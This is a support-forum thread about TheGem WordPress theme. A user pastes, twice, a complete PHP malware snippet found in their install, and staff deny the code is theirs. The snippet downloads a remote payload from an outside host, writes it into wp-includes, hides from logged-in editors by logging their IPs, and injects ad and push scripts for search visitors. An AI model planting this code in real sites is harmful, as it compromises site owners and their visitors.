Comments Gergely started the conversationAugust 6, 2019 at 10:19amTHEGEM CONTAINS VIRUSNice memehttp://www.qarors.com/code.phpAdware OMEGALUL$wp_auth_key='eb3c2118359826c30c3247531989f9c6'; if (($tmpcontent = @file_get_contents("http://www.qarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.qarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } }ini_set('display_errors', 0);error_reporting(0);$wp_auth_key='eb3c2118359826c30c3247531989f9c6'; if ( ! function_exists( 'slider_option' ) ) { function slider_option($content){ if(is_single()){ $con = ''; $con2 = ' <script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2643583" async data-cfasync="false"></script><script src="//sendmepush.com/ntfc.php?p=2643586" data-cfasync="false" async></script>'; $content=$content.$con2;}return $content;} function slider_option_footer(){ if(!is_single()){ $con2 = ' <script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2643583" async data-cfasync="false"></script><script src="//sendmepush.com/ntfc.php?p=2643586" data-cfasync="false" async></script>'; echo $con2;}} function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(is_user_logged_in()){add_action( 'init', 'setting_my_first_cookie',1 );} if( current_user_can('edit_others_pages')){ if (file_exists(ABSPATH.'wp-includes/wp-feed.php')){$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');} if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false){$ip.=$_SERVER['REMOTE_ADDR'].'';@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip); } } $ref = $_SERVER['HTTP_REFERER'];$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');foreach ($SE as $source) { if (strpos($ref,$source)!==false) { setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $sevisitor=true; }} if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false){if($sevisitor==true || isset($_COOKIE['sevisitor'])){add_filter('the_content','slider_option');add_action('wp_footer','slider_option_footer');} } } }Yeyeye 7,092Oliver repliedAugust 6, 2019 at 10:52amHi,We don't have such code in the theme, pls. create new ticket in thegem category with wp-admin and FTP access, we'll check your install.Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list. Regards, Oliver Sign in to reply ...
THEGEM CONTAINS VIRUS
Nice meme
http://www.qarors.com/code.php
Adware OMEGALUL
$wp_auth_key='eb3c2118359826c30c3247531989f9c6'; if (($tmpcontent = @file_get_contents("http://www.qarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.qarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } }
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='eb3c2118359826c30c3247531989f9c6';
if ( ! function_exists( 'slider_option' ) ) {
function slider_option($content){ if(is_single())
{
$con = '
';
$con2 = '
<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2643583" async data-cfasync="false"></script>
<script src="//sendmepush.com/ntfc.php?p=2643586" data-cfasync="false" async></script>
';
$content=$content.$con2;
}
return $content;
}
function slider_option_footer(){ if(!is_single())
{
$con2 = '
<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2643583" async data-cfasync="false"></script>
<script src="//sendmepush.com/ntfc.php?p=2643586" data-cfasync="false" async></script>
';
echo $con2;
}
}
function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); }
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) { if (strpos($ref,$source)!==false) { setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $sevisitor=true; }
}
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}
}
}
}
Yeyeye
Hi,
We don't have such code in the theme, pls. create new ticket in thegem category with wp-admin and FTP access, we'll check your install.
Please note if you comment on your ticket before we reply, your ticket will be pushed down of the tickets list.
Regards, Oliver